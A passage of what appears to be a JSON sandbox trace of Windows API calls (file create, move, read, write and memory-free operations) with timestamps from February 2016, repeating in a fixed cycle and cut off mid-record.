"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,562", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,572", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,612", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,843", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,843", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,853", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,853", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,863", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,863", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,873", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,873", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,883", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,883", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,893", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,893", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,903", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,903", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,913", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,913", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,923", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,923", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,933", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,933", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,943", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,943", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,953", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,953", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,963", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,963", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,973", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,973", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,983", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,983", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,993", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": 